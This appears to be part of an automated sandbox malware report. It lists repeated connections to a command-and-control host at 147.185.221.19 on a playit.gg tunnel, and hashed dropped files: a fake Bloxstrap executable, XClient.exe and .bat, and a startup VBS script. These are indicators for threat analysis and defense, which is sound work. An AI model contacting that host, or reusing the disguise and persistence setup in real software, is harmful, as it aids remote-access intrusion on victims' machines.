US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp

Files

memory/1432-0-0x00007FFFFD8A3000-0x00007FFFFD8A5000-memory.dmp

memory/1432-1-0x0000000000110000-0x0000000000924000-memory.dmp

C:\ProgramData\Bloxstrap-v2.5.4.exe

MD5 dbb820772caf0003967ef0f269fbdeb1
SHA1 31992bd4977a7dfeba67537a2da6c9ca64bc304c
SHA256 b2ac1e407ed3ecd7c7faa6de929a68fb51145662cf793c40b69eb59295bba6bc
SHA512 e8ac879c7198dffb78bc6ee4ad49b5de40a5a7dbbda53d427d0a034941487d13c8bb2b8d590a1fcdd81cd6abb8f21fdfcd52924eb00c45a42ee06c1e4b3d590f

C:\ProgramData\XClient.exe

MD5 2271dd87f3bf9de4b0cdffe63adbf8f4
SHA1 9ffbaf8862a5c5098bc98a11af024d8de23efa84
SHA256 2de44472db0baa936146b4194c9b5463e7fa8ce7f38d3c020decaf3ef7f1bff0
SHA512 58eaef8c7d63daa1207118fcc1b099f27e97acc5447f84a20eaf8741619cf4dbd149327f5701a0d8501c285dbc4e12ab1f1da1dd877ababd78bda0a5c1762ded

memory/4728-28-0x0000000000E80000-0x0000000000E98000-memory.dmp

memory/3168-30-0x00007FFFF9F5B000-0x00007FFFF9F5C000-memory.dmp

memory/4728-29-0x00007FFFFD8A0000-0x00007FFFFE361000-memory.dmp

C:\ProgramData\XClient.bat

MD5 a34475715e45e8367d3cbba514f176de
SHA1 9c20ae085c7a0c65c2565d7160773b5c59441759
SHA256 6df02430ef3b5f9bc01d0e62dbfc425e47323df4fd5a09cae01f3b17825c89d7
SHA512 776a46e92c021cee8e970972f4e37729fdc6aa58c24caa3d9788887599ce3a56a7321d3484ce680d2f900038482d365bc606ec692d56d83a5482f3aab1d21879

memory/4876-38-0x000001ED5E0E0000-0x000001ED5E102000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z2yhjlfs.dr0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4876-42-0x000001ED5E330000-0x000001ED5E338000-memory.dmp

memory/4876-43-0x000001ED5E360000-0x000001ED5E398000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5c0923e8e7765d761022bd427d59e9ca
SHA1 7490e1b19c5662e6339a68ba67920992dbfa3d33
SHA256 299f9fcb2628833eea10626dc3888f94f104d317cb95c846ef61e3cf4521efa7
SHA512 a8e9a422d44ddfa8ceba2b245660e2657b3d2bd416d59dcc667baa74fcf113ec09b9b1c394aec37fe0c8aac10f938c710de3c0909db03b605097aa62569c01e1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_623.vbs

MD5 47ac0afd532e94d7393cad30f2ee1162
SHA1 d04a845ee060407d3f2d4f46003806cc54dd76de
SHA256 5ea2708c84c04ff9fdadd656fa736480014347ec599556f0583f598c31fc604b
SHA512 378b2d45393bbf413e39b2a68c9ea51b1a84d22d54951a9c69f0d4ec77fa2228f80d8db3e9713b97b02912a107235cf1109b233a9b71517a9443e670bb3a7b37

memory/4728-65-0x000000001BAD0000-0x000000001BAE0000-memory.dmp

memory/3388-76-0x000001C56C990000-0x000001C56C9A8000-memory.dmp

memory/4728-81-0x00007FFFFD8A0000-0x00007FFFFE361000-memory.dmp

memory/3168-82-0x00007FFFF9F5B000-0x00007FFFF9F5C000-memory.dmp

memory/4728-83-0x000000001BAD0000-0x000000001BAE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1